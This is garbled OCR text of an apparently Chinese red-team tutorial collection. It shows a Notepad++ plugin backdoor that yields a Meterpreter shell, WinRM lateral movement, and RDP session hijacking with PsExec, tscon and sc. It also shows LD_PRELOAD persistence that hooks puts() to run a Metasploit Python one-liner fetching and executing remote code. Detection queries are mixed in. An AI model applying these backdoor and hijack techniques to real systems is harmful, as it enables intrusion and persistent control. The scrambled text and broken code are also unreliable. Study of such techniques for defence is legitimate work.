HR, 每 一 家 都 用 Flash 做 了 精美 的 光盘 ， 用 心 的 挑选 了 无 后 门 无 再 的 黑客 工具 ， 甚 至 还 有 当期 网 
让 热门 的 音乐 、 视 频 、Flash 动 画 等 免费 资源 ， 磁 到 塞 署 假 、 节 假日 还 会 温 均 的 做 个 专题 , 把 一 群 
Rane EUEN, 


如 今 除了 专门 参加 CTF 的 同学 ， 几 乎 很 少 有 人 同时 关注 这 些 领 域 了 ， 大 家 认真 的 分 成 了 气 宗 和 剑 
和 鸟 云 、FreeBuf、 众 测 平台 等 虽然 也 有 入 侵 实例 、 知 识 分 享 ， 但 总 归 是 少 了 一 些 人 文 气息 和 情 


Em 
T ===- Welcome To Hacker Union For China ! Thank You For Your Support ! -------- 
iq cuum mm 





站 维护 祖国 尊严 爱 我 中 华 强 我 中 华 HEE ee 


ylogo 还 是 曾经 的 那个 logo， 联 盟 的 国徽 还 是 那个 国徽 ， 只 是 人 的 心 变 了 。 
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PTES 中 文 版 
http://netsec.ccert.edu.cn/hacking/files/2011/07/PTES MindMap CN1.pdf 
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DEA CX) 红 蓝 对 抗 关于 后 门 对 抗 


季 是 作 《APT 对 抗 〈《 一 ) 红 蓝 对 抗 关于 后 门 对 抗 》 的 补充 。 


IpJ/editbook.ah-strategy.online/2/book?id-91 












dhe 


作为 demo， 构造 notepad++ backdoor 


ER SR, RBSAPC, RF 





Sac /Nb m8 
ARITA, E 





iX Bynotepad-4, 7H 
为 重要 。 该 系列 仅 做 后 门 思路 。 





1 2017 
第 一 季 的 原则 ，demo 未 做 任何 对 抗 安全 软件 ， 并 且 demo 并 不 符合 实战 要 求 。 仅 提 出 思路 。 


gemo 并 未 做 任何 免 杀 处 理 。 导 致 反 病毒 软件 报 毒 。 如 有 测试 ， 建 议 在 虚拟 机 中 进行 测试 。 
dows 2003: ip 192.168.1.119 
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Ethernet adapter 本 地 连接 > 


Connection-specific DNS Suffix 

IP Address. . i See eA pue eu uu, 
Subnet Mask . . . : oe 2.2 255.255.255.] 
Default Gateway . s : 25492.168.1.4 


RAL Jimi | 硬件 | 高 级 | 自动 更 新 | 远程 | 


系统 : 
Microsoft Windows Server 2003 R2 
Enterprise x64 Edition 


Service Pack 2 





开放 端口 : 


C: Docume and Settings \Administrator>netstat 一 an ifindstr “LISTENING” 
TCP -9.86.6:21 .0.8.8:0 LISTENING 
TCP .8.6.86:86 -68.0.8: LISTENING 
TCP -8.6:135 .0.0.08: LISTENING 
TCP .0.8:445 .8.6.8: LISTENING 
TCP .8.0:1825 -0.0.0: LISTENING 
TCP -0.0:1026 .8. : LISTENING 
TCP a .@. : LISTENING 





Notepad++ v7.5.1 (64-bit) 





Author : Notepadtt team 


tenad-plus-pluc 
epad Pius Pit 


Home Page : https://note plus. org/ 


GNU General Public Licence 


This program is free software; you can redistribute it and/or a 
modify it under the terms of the GNU General Public License 














notepad++ 版 本 : as Published by the Free Software Foundation; either 导入 dll 
(300 语言 LL) gE IRQ) 
首选 项 ... 
语言 格式 设置 .. | 
Sue. XE 
— . EX d 导入 括 件 al Sr 
sre... ~ E 
编辑 弹出 菜单 一 ifa 
插件 : notepad++ 


v7.6.x 以 上 版 本 提示 ， 后 重新 打开 notepad++， 来 触发 payload。 





"20/1 











开放 端口 变化 


or»netstat -an ifindstr "LISTENING" 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


: Docume 
[GP 
[CP 
TCP 
[CP 
TCP 
TCP 
TCP 


sosssssoc a 


co & © © © S s 2 


at 
.8. 
-G. 
-G. 
20. 
M. 
.8. 
B 
8 


co © © © © © S 
Qeoaoooao qo & 


ti/handler) > show options 
jule options (exploit/multi/handler): 


Name Current Setting Required Description 


load options (windows/x64/meterpreter/bind tcp): 
Current Setting Required Description 
proces : Exit technique (Accepted: '', seh, thread, process, none) 


443 The listen port 
192.168.1.119 The target address 


oit target: 


mi 
id 


Name 


Wildeard Target 


te 


ploit(multi:handler) > exploit -2 


arted bind handler 
ing stage (206403 bytes) to 192.168.1.119 
eeping before handling stage... 
rpreter session 1 opened (192.168.1.5:42903 -» 192.168.1.119:443) at 2018-12-31 06:24:06 -0500 
lon 1 created in the background. 
ploit(multivhandler) > sessions -i 1 
Starting interaction with 1. 


lérpreter > getuid 

à username; WINOSX64\Administrator 
[preter > getpid 

ent pid: 2492 

~Erpreter > ps 
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meterpreter » getuid 

Server username: WINO3X64XAdministrator 
terp » getpid 

Current pid: 249 


Proc 


oOoooodo 


So 


5 


oo 


exe 
\inetints.e 


¥GAuth\VGAuthService . exe 
C:\Program 
C: \WINDOWS' 
AUTHORITY \ - 
AUTHORITY 


Notepad** v7.6.1 new enhancement and bug-fixes 


Several bug-fixes & enhancement on Plugins Admin. 

Notepad++ will load plugins from %PROGRAMDATA% instead of %LOCALAPPDATA%. 
Fix installer's plugins copy issue under Linux (by using WINE). 

Fix Installer HI-DPI GUI glitch. 

Fix "Import plugins" not working issue. 

Fix printer header/footer font issue. 


Make installer more coherent for the option doLocalConf.x ml. 


SN PU SF wYP 


Make text display right in summary panel. 
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* 










1 Z demo 
基本 以 为 第 六 季 的 demo 便 2 AR f notepad++ 
旧 是 demo 系 列 的 壹 虽 并 没有 按照 作者 的 想法 来 表述 。 顾 引入 第 七 季 。 





a be 文 
EKTE 


gp Notepadt+ v7.5.9 ZRA 


ELI Notepadt+ v7.5.9 的 安装 进 


在 开始 安装 之 前 ， 建议 先 关闭 其 地 所 有 应 用 程序 。 这 将 
Jut “SRE” Eden EST ND BER 
Esbisio t fL. 
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& A. eK 






4 Notepadtt 


=i x! 
ERS 


选 定 Notepadt+ v7.5.9 要 


安装 的 立 件 来。 


i 
i 





Setup 将 安装 Notepadtt v7.5.9 在 下 列 文件 夹 。 要 安装 到 不 同文 件 夹 ， 单 击 QUE 
Q)..] RBM IMB. dd FEMI BER. us 


目标 文件 来 
[EhNotepadt+ pis... 


Al): 12.3MB 
可 用 空间 : 19.568 


——————————————A———A—M———Y— 


«r-se[r-5so»| RHO | 


I 
1 








^ 5.2.3790) 
2003 Microsoft Corp. 


NDocuments and Settings Wdministrator>ipconf ig 


Windows IP Configuration 


Connection 

IP Addre à ` ^. 192.168.1.119 
Subnet Mask... . . - 5 : 255.255.255.8 
Default Gateway . 2. >. 192.168.1.1 


:\ocunents and Settings Administrator> 


shell4Q BRETT : 
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TI nip.//A8216 











epad--*7.5.9 





e 安装 路 径 : E:\Notepad++\ 












E L2 inetpub =) Config 
EJ C wwwroct 2 disabled 


_. aspnet client ` DSpellCheck 


3 mimeT ools 


1 MppConverter 
[2 D Notepadt* 


(J localization 
L2 APIs 
Config 
UN disabled 
) DSpellCheck 
., mimeTools 
La NppConverter 
L.] updater 


C2 System Volume Information 


检查 默认 安装 情况 如 下 : 
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2013-01-0 
2019-01-0 





e 





Directory 
Directoty 
Directory 
Directory 


Directory 


i Notepad++ v7.5.9 (64-bit) 


Author : Notepad++ team 


Home Page : https: //notepad-plus-plus. org/ 


GNU General Public Licence 


This program is free software; you can redistribute it and/or a 
modify it under the terms of the GNU General Public License 

as published by the Free Software Foundation; either 

version 2 of the License, or (at your option) any later 

version. 


This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied 
warranty of MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE, See the GNU General Public License 
for more details. 


st 





mms — 
a 运行 名) 插件 ©) Suo ? 

i= Converter b 
DSpellCheck > 
MIME Tools > 









端口 如 下 : 


C:NDocume i ini s ifindstr "LISTENING" 
TCP - 3 LISTENING 
TCP ~6.0.6: LISTENING 
TCP M ME LISTENING 


TCP 5 3 = : LISTENING 
TCP -6. : LISTENING 
TCP 2.9. : LISTENING 
TCP .8.0.80:€ LISTENING 
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1 










IF5A: 
E | : > n P 
d++ v7.6 以 下 版 本 插件 路 径 为 : 


otepad++\plugins\ 

lo 

pad++ V7 .6 以 上 版 本 插件 路 径 为 : 

uments and Settings\All Users\Application Data\Notepad++\plugins 

























http://192.168.1.119/56.ASPX | — 
TP Po 7) 时 间 X] E 

C3 APIs 2019-01-02 20:48:24 0 Directory 
] inetpub <> Config 2019-01-02 20:48:24 0 Directory 
Eme C disabled 2019-01-02 20:48:24 = 0 Directory 
4 Ci espnet. client £3 DSpellCheck 2019-01-02 20:48:24 0 Ditectoty 

C3 HTMLTags_x64 2019-01-02 21:12:47 0 Directory 
3 E. (2 mimeTools 200130102204824 — 0 Directory 
E à E Eu ©) NppConverter 2019-01-02 20:48:24 — 0 Directory 
4 c © 1 ti 






C Config 

C disabled 

C3 DSpellCheck 

CZ mimeTools 

C NppConverter 

2 HTMLTags x64 

^ Ei updater 

1 3 System Volume Information 
? C3 HIMLTags x54 


标 机 管理 员 再 次 打开 notepad++: 


+: demo 中 不 隐藏 自身 





tte) BOW 2 
About Notepadtt Plugin > 
Converter > 
USpe eck 
MINE Tools 
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端口 变化 如 下 : 


ifindstr “LISTENING” 
TCP LISTENING 
ICP LISTENING 
TCP LISTENING 
TCP a LISTENING 
TCP : LISTENING 
TCP 7 LISTENING 
TCP 5 LISTENING 


Settings \Administrator>netstat -an ifindstr "LISTENING" 
0.0.0.0:8 LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 





Soeooooasoe 


msf 连接 目标 机 : 


nsf exploit(multi.handler) = show options 
Module options (exploit/multi/handler): 


Nang Current Setting Required Description 


Payload options (windows/x64/meterpreter/bind tcp): 
Name Current Setting Required Description 
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) 


LPORT 443 es The listen port 
RHOST The target address 


Exploit target: 
Id Name 


6 Wildcard Target 


msf exploitimutti handler) > set rhost 192.168.1.119 
rhost => 192.168.1.119 
mst exploit(multichandler} > exploit -z 


{*} Started bind handler 

[*] Sending stage (206403 bytes) to 192.168.1.119 

I*] Sleeping before handling stage... 

[*] Meterpreter session 2 opened (192.168.1.5:33089 -> 192.168.1.119:443) at 2019-01-02 08:20:39 -0500 
[*] Session 2 created in the background. 

mst exploit (wultivhandler} > 

msf exploit (multishandler) = sessions -l 


Active sessions 


Ae Name Me Information Connection 


2 Weterprijer xó4/windows WINOSXG4\Admanistrator 8 WINO3X64 192,168.1.5:33089 -> 192.168.1.119:443 (192.168.1.119) 


安全 是 一 个 链 安全 ， 攻 击 引入 链 攻击 ， 后 门 引入 链 后 门 。 让 渗透 变 得 更 加 有 趣 。 










Windows Remote Management(Winrm) 之 前 ， 首 先 要 介绍 WS-Management (Web 服 务 器 管 
义 ，。WS-Management 协 议 是 一 种 基于 SOAP 协 议 的 DMTF 开 放 标 准 ， 用 于 对 服务 器 等 网 络 设 
行 管理 。WinRM 是 windows 对 于 该 协议 的 一 种 实现 。 


微软 官方 文档 介绍 : 


WinRMBRAS X tz Windows Server 2008 上 自动 启动 。 在 Windows Vista 上 ， 该 服务 必须 手动 启 


认 情况 下 ， 未 配置 WinRM 从/ 器 。 即 使 WinRM 服 务 正在 运行 ， 也 无 法 接收 或 发 送 请 求 数据 的 
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winrm set vinrn/conf ig/client/auth (XBasic-"true'? 


示 倒 : 为 所 有 工作 组 计算 机 启用 ;Negotiate 。 


winrm set winrm/config/client @(TrustedHosts="<local>"> 


winrm help 
winrm help 
winrm help 
winrm help 
winrm help 


uris 
aliases 
certmapping 
input 
switches 


PS C: Wsers Adminis trator> winrm GREE DOs dg 
1 im 


对 其 进行 远程 访问 。 


Ws-Man 对 此 机 器 


PS 6: Miserssüdninistkatory 


winrm e winrm/config/listener # 查 看 监听 情况 
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& IP 的 请 求 。 





migja, 


Ws-Man EMES ES IP Bi 


行 了 更 新 ， 队 用 于 远程 管理 。 


urrP:/7* 上 创建 WinRM 侦 听 程序 接受 Ws-Man 对 此 机 器 .IP 的 请 求 
nRM PRAT Se eR BRA 
C:Wsers\Administrator> winrm e winrn/config/listener 
istener 
Address = * 
Transpórt = HTTP 
Port = 5985 
Hostname 
Enabled = true 
URLPrefix = wsman 
GertificateThumbprint 
ListeningOn = 18.580.1.208. 127.0.0.1, 169.254.154.2, ::1, 1::5801:ee, fe80::5 
fe:18.50.1.208*12, fe80::5efe:169.254.154.2714, fe88::1484:7344:b5c5:23f£f»11, fe 
::81e2:ad2f£f 28189 :9a02713 


vr 


BREESE nude 


在 winrm 开 启 了 5985 进 监听 并 使 用 HTTP 协 议 进 行 传输 ， 而 ListeningOn 字 段 则 是 监听 
和 的 jp 地 址 (都 是 自身 ip 地 址 )。 


ns 过 客户 端 连接 服务 端 进行 远程 代码 执行 的 时 候 会 出 现 如 下 报错 


m HTTPS a 
des 


"a 





: 原因 是 winrm 客 户 端 维护 着 一 个 信任 主机 列表 只 有 在 信任 主机 列表 中 的 服务 端 才 允许 连接 。 这 里 我 
必 们 投 置信 任 主机 列表 为 任意 主机 。 


Winrm set winrm/config/client @{TrustedHosts="*"} 


! 测试 远程 服务 器 是 否 开 启 winrm 


Test-WsMan 10.50.1.208 # 在 powershell 中 执行 
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PS C:\Windows \system32> Test-lisman 18.50.1.298 


: http://schemas .dmtf org/whem/usman/identity/i/usmanidentity. y 
sd 
rotocolUersion http:/7schemas.dntf .org/ubemn/uwusmanZi/wsman.xsd 


roductUendor Microsoft Corporation 
roductUersion = OS: 8.0.0 SP: 8.0 Stack: 2.6 


S C:Nilindows \s ysten32> 





技术 复 现 
横向 移动 (winrs) 
winrs -r:http://10.50.1.208:5985 -u:administrator -p:xxxxxxxx ipconfig 


= Windows \system32>winrs —rihttp://16.56.1.268:5985 —-u:administrator —p:iiimade 
WOU ipconfig 


Jindows IP 配置 


FEIER) DNS fi E p Ip 
IPES IPv6 地 址 . . . . ... . . : fe80::81e2:ad2£ :8109:9a02713 
EE IPod 地 址 Ll... : 169.254.154.2 

mae gh ta, 255.255.0.8 


配器 本 地 连接 : 


连接 特定 的 DNS | 
bi 


1::581:ee 
fe8B::1484:7344:þb5c5:3ff711 
18.58.1.288 

255.255.255.8 

fe8B:: 7257: bf ££ : £e23:56B81711 
180.580.1.1 





横向 移动 (Invoke-Command) 


Invoke-Command -ComputerName 10.50.1.208 -ScriptBlock {ipconfig} -credential adit 


> 
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c administrator 


/ubenZusmanZidentity/i/wsmanidentity.x 


à B/uben/usman/i/usman.xsd 
JductUendor Microsoft Corporation 
ductUers ion 08: 0.0.0 SP: 8.0 Stack: 2.8 


>: Windows \systen32> Invoke-Command -ComputerName 18.50.1.2808 -ScriptBlock (if 
nfig? -credential administrator 





RER Wipcontiggsa SNA 
2 ‘EE: CA\Windows\System32\cmd.exe - powershell EM m 


C:\Windows \system32> Invoke-Comnand -ConputerNamne 18.50.1.208 -ScriptBlock ¢i 
config? -credential administrator 


Nindows IP 配置 


fe89::81e2:ad2f:8109:9a82713 
169.254.154.2 
255.255.8.8 


se 038 48 dn 184 


ESTHER DNS S RA 
bre iW. 2. . = 1::561:ee 
地 链 上 IEu6 地 址 . . : fe88::1484:7344:b5c5 :3£ £711 
[Pu4 id. dac iT Er 
d iH EOS 255.255.255.8 
EA X : fe8B::7257:bfff:fe23:5681711 





有 横向 移动 (Enter-PSSession) 


Enter-PSSession -ComputerName 10.50.1.208 -Credential administrator 
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S HR e 


Fg Pad QD e administrator 
BB D: | 





iPS C: Windows \s ystem32> 
PS C:\Windows \system32> Enter-PSSession —ComputerName 10.50.1.208 -Credential adi 
ministrator 8 





验证 成 功 后 弹 回 远程 主机 的 powershell 
ESTER: CAWindows\System32\cmd.exe - powershell 


[10.50.1.2881: PS C:\Users\Administrator\Documents> whoani 
dic Nadministrator 
{16.56.1.2@81]: PS C:\Users\Administrator\Documents> ipconfig 


Jindows IP 配置 


) 适配器 Npcap Loopback Adapter: 


地 : hese fe88::81e2:ad2£ :8109 :9a02713 
v4 HAE A 3 . + 169.254.154.2 
Soc on E , : 255.255.0.8 


连接 特定 的 DNS ues Ri pu 
IPu6 地 址 S ORE MATE : $1::501:ee 
本 地 链接 8 20 地 址 . 。。. : fe80::1484:7344:b5c5:3£f711 
IPv4 HAt 2. . eO a a AS01208 
T : 255.255.255.0 
: fe80:: 7257: bff f :fe23 56017411 





威胁 检测 


数据 源 :文件 监视 ， 身 份 验证 日 志 ， 网 络 连 接 监 视 ， 进 程 监视 ， 进 程 命令 行 参数 
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QM 流量 特征 


nrs、Enter-PSSession、Jnvoke-Command 通 信 流 量 抓 包 发 现 其 通信 特征 相同 ， 都 是 通过 
oodwsman 来 进行 验证 和 下 发 命令 。 并 且 即 使 WinRM 是 使 用 http 通 信 的 但 是 


> x * 








Qaan 











shark :分 组 7961 » Enter-PSSession.pcapng 


Transmission Control Protocol, Sre Port: 52803, Dst Port: 5985, Seq: 8576, Ack: 479, Len: 576 
» [7 Reassembled TCP Segments (8877 bytes): #7953(1001), #7954(1460), #7956(1460), #7957 (1460), #7958(1460), #7960(1460), 47961 
Hypertext Transfer Protocol 
POST /wsman?PSVersione2.0 HTTP/1.1\r\n 
Connection: Keep-Alive\r\n 
Content-Type: multipart/encrypted;protocol="application/HTTP-SPNEGO-session-encrypted" ;boundanys"Encrypted Boundary” \r\n 
4 [truncated] Authorization: Negotiate TIRMTVNTUAADAAAAGAAY AI AMMBuAWABm AAAAAAAAABY AAAAGg Aa AFEAAAAOAAM AC gAAABAAE AAG Ag AANYK I AE 
NTLM Secure Service Provider 
User-Agent: Microsoft WinRM Client\r\n 
4 Content-Length: 7876\r\n 
[Content length: 7876) 
Host: 10.56.1.208:5985\r\n 
Mn 
[full request URI: http;//10.50, 1. 208:3 983 /wsman? PS Versionz2.0] 
[HTTP request 2/5] 











事件 4656 ; Microsoft Windows 安全 审 校 。 








RE ^ at ecm — 1 T 
a2 wees O eaae 5o , » 
已 请 求 到 对 急 的 句柄 。 
主题 : 

Sx ID: 1205-PC Administrator 

RAS: Administrator 

帐户 域 : 1205-PC 

SER ID: 0x936974 
ried 

PISS: Security 

D n Key 

Wes: \REGISTRY\MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\WSMAN 

AMA ID: 0x560 
进程 信息 : 

进程 ID: 0x1540 





网 络 特征 : (级 别 : 高 ) 
sysmon 检 测 到 powershell 或 者 winrs.exe 发 起 的 网 络 连接 信息 


eventNum:3 AND DestinationPort:5985 AND (Image contains:"powershell.exe" OR 
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sazz raa eas Bae smit 








: (级 别 : m) 
而 on 检测 到 到 winrm ,vbs 的 进程 创建 


VentNum:1 AND CommandLine contains winrm.vbs 


行 参数 特征 : (级别: 高 ) 


a 


CommandLine contains "Invoke-Command" OR CommandLine contains "Enter-PSSession" 


WINRM 服 务 端 
HERE: (级 别 高 ) 


使 用 winrm 执 行 远程 命令 时 ， 目 标 机 器 会 启动 一 个 winrshost.exe 来 执行 远程 命令 。 


leventNUm:1 AND ParentImage contains "winrshost.exe" 
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T1076 Remote Desktop Protocol 


远程 桌面 是 操作 系统 中 的 常见 功能 。 它 允许 用 户 使 用 远程 系统 上 的 系统 桌面 图 形 用 户 界 面 登 录 到 交 
互 式 会 话 。Microsoft 将 其 对 远程 桌面 协议 (RDP) 的 实现 称 为 远程 桌面 服务 (RDS) o 


如 果 启用 了 服务 并 允许 访问 具有 已 知 凭据 的 帐户 ， 则 攻击 者 可 以 通过 RDP / RDS 连 接 到 远程 系统 以 
扩展 访问 权限 。 攻 击 者 可 能 会 使 用 凭据 访问 技术 来 获取 与 RDP 一 起 使 用 的 凭据 。 攻 击 者 还 可 以 结合 
使 用 RDP 和 总 污 技术 来 实现 持久 性 。 


攻击 者 还 可 能 执行 RDP 会 话 劫持 ， 其 中 涉及 窃取 合法 用 户 的 远程 会 话 。 通 常情 况 下 当 其 他 人 试图 窃 
取 其 会 话 (可 以 理解 为 windows 的 快速 切换 用 户 功能 ) 时 会 收 到 问题 提示 并 要 求 出 示 密码 。 凭 借 系 统 权 
限 (SYSTEM 权 限 ) 的 终端 服务 控制 台 c:\Wwindows\system32\tscon.exe [session number to be 

stolen]， 攻 击 者 可 以 切换 会 话 而 无 需 输入 密码 。 这 可 能 导致 攻击 者 窍 取 域 管理 员 或 更 高 特权 的 账户 


会 话 。 


技术 复 现 


前 置 条 件 ; 拥有 某 个 本 地 管理 员 组 账号 的 权限 
目的 : 通过 rdp 会 话 劫持 使 我 们 可 以 从 该 管理 员 组 账号 切换 到 本 机 任意 一 个 账户 的 rdp 会 话 中 
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我 们 获取 了 其 本 地 管理 员 组 一 个 用 户 (huahua) 的 赁 据 。 


x 


c; Windows \systen32\cad. exe 


ft Windows [本 6.1.76011 
& cc) 2809 Microsoft Corporation. 保留 所 有 


Users \huahua>net localgroup administrators 
administrators 


管理 员 对 计算 机 4 域 有 不 安 限 制 的 完全 访问 权 


ministrator 
nain Admins 
pprise Admins 


hua 


irs Nhuahua?a,, 


:Wsers\huahua>net group “domain admins“ “domain 


Donni in Admins 
域 管理 员 


| 


: Users \huahua 





有 横向 移动 (PSExec) 


Psexec.exe -s cmd # 获 取 SYSTEM 权 限 的 she11 
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SCOR OSD OILS LENE 


Microsoft Windows 上 N 6.1.7601] 


GB 


<c) 2009 Microsoft Corporation, VR E P 


C:\Windows \s ystem32 >whoami 
dc \huahua 


C:\Mindows \system32>cd_ c:\users \huahua\desktop\ 
c: Users \huahua \Desktop>PsExec.exe -s cmd 
PsExec v2.2 — Execute processes remotely 


Copyright CC) 2001-2016 Mark Russinovich 
Sysinternals ~ wuw.sysinternals.com 


Microsoft Windows [ S. 6.1.76011 A UNUM, 
所 有 <c) 2089 Microsoft Corporation. {F8 PT. 


C: Windows \s ystem32 >whoami 
nt authority\systen 


C:\Windows s ystem3225,, 








query user # 查 看 当前 存在 的 会 话 





PAC: \Windows\s ystem32>query user ; ' ; 
HPE an ; TARTE 时 间 
administrator } 11 2819/18/23 16:1 


huahua rdp-tcp#ð 15317 . 2019/18/26 14:3 


IE 





| C:\Windows\syvstem32> 


tscon 2 /dest:rdp-tcp#0 #2 为 administrator 的 会 话 id，rdp-tcp#9 为 我 们 当前 


> 
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TE C:\Windows \system32\cad. exe 


ft Windows LIRA 6.1.769811 ACA 
«c? 28089 Microsoft Corporation. 保留 所 有 权利 : 


Jsers Midninistrator>whoani 
dninistrator 


Users Midministrator> Aa m 








以 看 到 我 们 已 经 成 功 切换 到 了 域 管理 员 的 会 话 中 。 
模 向 移动 (SC) 

5 理 为 使 用 sc 命令 实现 执行 SYSTEM 权 限 的 命令 

1 query user # 查 看 当前 存在 的 会 话 


4 $C create huahua binPath= "tscon 2 /dest:rdp-tcp#0" 
TSc start huahua 


; 
| 
| 
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BC? Windows Ns ystem32 create huahua binPath- "tscon 2 /dest ?rdp-tcpt” 
FLSC] CreateService | 


i C: Windows\system32\cad. exe 


Microsoft Windows [ : ; 
HRA PAA <c> 2889 Microsoft Corporation. 保留 所 有 权利 。 


C: Nisers Midninistrator?uhoami 
dc Nadministrator 


C: Misers Midministrator?,, 








sc delete huahua # 清 除 痕迹 


威胁 检测 
进程 特征 


通过 tscon.exe 实 现 RDP 动 持 的 前 提 为 执行 tscon.exe 的 用 户 权 限 为 SYSTEM， 可 以 通过 检测 新 创建 
的 tscon.exe 进 程 的 User 是 否 为 SYSTEM 来 判断 是 否 发 生 了 可 疑 的 RDP 动 持 。 


Image contains "tscon.exe" AND USER contains "NT AUTHORITYNNSYSTEM" 
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idence Leve? 


leet Cosmandi ine 
Image 


ntProcts sGutd 


iniques_id 
igues Name 


naiSessionId 











* c 
* 
* 
本 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 
* 





Microsotts sten 





Techniques 








?$01.17518 (win7spirts.101119-1530) 





N e 4FCÓl 









Oxde? 


Cr\ windows sy 





Cr \windows’ Systen32 








(C8CD5635-8467 


S$ DAF -Q000- 00192F920000) 





-3063-0000-0010F33£2701) 


S3crosoft Corporation 


T1076. Remote Deskt 





T2076 


Remote Desktop ? 





o 
NT AUTHORITYXASYSTEM 


2019-10-26 07:26:23.2 





An&G9e bNSKQSTTVOQLA 


at lpha-secur 
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Oh, SHAS 6e 6DO38CO6176657 





TECK TSZSS69EE DES 



















已 昕 开会 话 与 窗口 站 的 连接 。 


ES: 
帐户 名 : 
帐户 域 : 
登录 1D: 
会 话 
会话 名 : 
PINES: 
ERRE: 
SP pete: 


huahua 
wipcl 
0x249034b 


RDP-Tcp#0 


TIANHE-SECEND 


10.1141.180 


当 用 户 断 开 与 现 有 终端 服务 会 话 的 连接 , 或 者 用 户 使 用 “快速 用 户 切换 ”高 开 砚 有 点 面 时 生成 此 事件 。 





EP: 
客户 端 地 址 : 









administrator 
MOLECULE-LABS| 
0403262 


RDP-Tcp&'O 


TIANHE-SECEND 
103141180 


当 用 户 重 新 连接 到 现 有 终端 服务 佐 话 SAP REAPS MRSS, 
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Ux 权 限 维持 之 LD_PRELOAD ^ 


Bid Ens Fulks, 





T 作 系 统 的 动态 链接 库 在 加 载 过 程 中 ， 动 态 链接 器 会 先 读 取 LD_PRELOAD 环 境 变量 和 默认 配 
F/etc/ld.so.preload ， 并 将 读 取 到 的 动态 链接 库 文件 进行 预 加 载 ， 即 使 程序 不 依赖 这 些 
接 库 ，LD_PRELOAD 环 境 变量 和 /etc/1d.so.preload 配置 文件 中 指定 的 动态 链接 库 依然 
载 ,因为 它们 的 优先 级 比 LD_LIBRARY_PATH 环 境 变 量 所 定义 的 链接 库 查找 路 径 的 文件 优先 级 
， 所 以 能 够 提前 于 用 户 调用 的 动态 库 载 入 。 


LD_PRELOAD 环 境 变量 ， 能 够 轻易 的 加 载 一 个 动态 链接 库 。 通 过 这 个 动态 库 劫 持 系统 API 函 
每 次 调用 都 会 执行 植 入 的 代码 。 

站 是 一 个 计算 机 函数 ， 功 能 是 根据 动态 链接 库 操作 句柄 与 符号 ， 返 回 符号 对 应 的 地 址 ， 不 但 可 
‘ y 函数 地 址 ， 也 可 以 获取 变量 地 址 。 

定义 在 Linux 操 作 系统 中 的 dlfcn.h 中 ， 函 数 原型 如 下 : 

id * dlsym(void * handle,const char * symbol) 


handle: 由 dlopen 打 开动 态 链接 库 后 返回 的 指针 ; 
symbol: 要 求 获取 的 函数 或 全 局 变量 的 名 称 。 


B: void 指向 函数 的 地 址 ， 供 调用 使 用 。 


«stdio.h» 
<unistd.h> 
«dlfcn.h» 
«stdlib.h» 


Bat puts(const char *message) { 


Tint result; 

/ new puts = dlsym(RTLD NEXT, "puts"); 
D / do some thing 

Boxe Spur s 调 用 : 

result = new puts(message); 

V7 这 里 是 puts 调 用 之 

return result; 


gcc hook.c -o hook.so -fPIC -shared -ldl -D GNU. SOURCE 
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。 -fPIC 选项 作用 于 编译 阶段 ， 告 诉 编译 器 产生 与 位 置 无 关 代码 (Position-Independent 
Code) ; 这 样 一 来 ， 产 生 的 代码 中 就 没有 绝对 地 址 了 ， 全 部 使 用 相对 地 址 ， Wem 
载 器 加 载 到 内 存 的 任意 位 置 ， 都 可 以 正确 的 执行 。 这 正 是 共享 库 所 要 求 的 ， 共 享 库 被 加 载 时 
在 内 存 的 位 置 不 是 固定 的 。 

。 -shared 生成 共享 库 格式 

。 -d 显示 方式 加 载 动 态 库 ， 可 能 会 调用 dlopen、dlsym、dlclose、dlerror 

。-D_ GNU SOURCE 以 GNU 规 范 标准 编译 


编写 好 劫持 puts 函 数 的 代码 后 ， 需 要 先生 成 一 个 Metasploit 森 马 ， 使 得 在 系统 调用 puts 孙 数 之 前 ， 都 
执行 一 次 木马 。 


Module options (exploit/multi/script/web delivery): 


Name Current Setting Required Description 


SRVHOST d ` The local host to listen on. This must an address on the local machine or 0.0.0.0 
SRVPORT. y! The local port to listen on 

EIS no Negotiate SSL for incoming connections 

SsLcert no Path to a custom SSL certificate (default is randomly generated) 

URIPATH no The URI to use for this exploit (default is random) 


Payload options (python/meterpreter/reverse tcp): 
Name Current Lantern hegoi red Soh en 


LHOST 192.168. 170 138 yes The Listen address (an interface may be specified) 
LPORT 443 yes The listen port 


Exploit target: 
Id Name 


Python 


msf5 exploit( v ) > exploit 
[*] Exploit running as opcs job 2. 
{*] Exploit completed, but no session was created. 


1*] Started reverse Hd nanoir on 132: 168.170. 138:443 

msf5 exploit(* E H y} > [*] Using URL: http://8.9.0,8:8080/olZJy3wue 

1*] Local IP; http: Ina. 168. 170, 138: $089/01Z3y3wue 

{*] Server started. 

I*] Run the following command on the target machine: 

python -c “import sys;u= import ('urllib’+{2:'',3:'.request'}{sys.version _info[9]],fromlist=('urlopen‘,}};r=u-urlopen{'http://192.168.179.138;:8080/01ZJy3Wu 
e');exec(r.read());" 





msf5 exploit(ssiti int i sy} > 


exploit/multi/script/web delivery 模块 能 够 直接 生成 一 条 Python 命 令 ， 这 能 够 非常 方便 的 
获得 Meterpreter。 接 下 来 ， 将 劫持 puts 函 数 的 代码 做 一 些小 改动 ， 在 执行 puts 之 前 ， 调 用 系统 函数 
system 来 运行 python 命令 ， 这 样 每 次 调用 puts 都 可 以 获得 Meterpreter 会 话 。 


ryn0xsy@virtual-machine: -/Project Ee o 


#include ~ 
#include - 
#include «< 
#include 


int puts(const char *message) | 
int (*new_puts)(const char *message); 
t; 


new puts ) 4 
Arten r VK t "m [2 TANI 4 info[8]], f ste("urtopen 


new_puts (message); 
return result; 





正常 执行 的 过 程 


rvn0xsy @virtual-machine: ~/Project 


tyaexeyovirtust-wachine: ~/Project$ vim hook.c 
rvnOxsyGvirtual-machine:-/Project$ gcc hook.c -o hook.so -fPIC -shared -ldl -D GNU SOURCE 
rvnOxsy@virtual-machine:~/Project$ export LD PRELOAD=./hook.so 


rvnOxsy@virtual-machine:~/Project$ whoami 
rvnO@xsy 
rvnOxsyQvirtual-machine:-/Project$ 
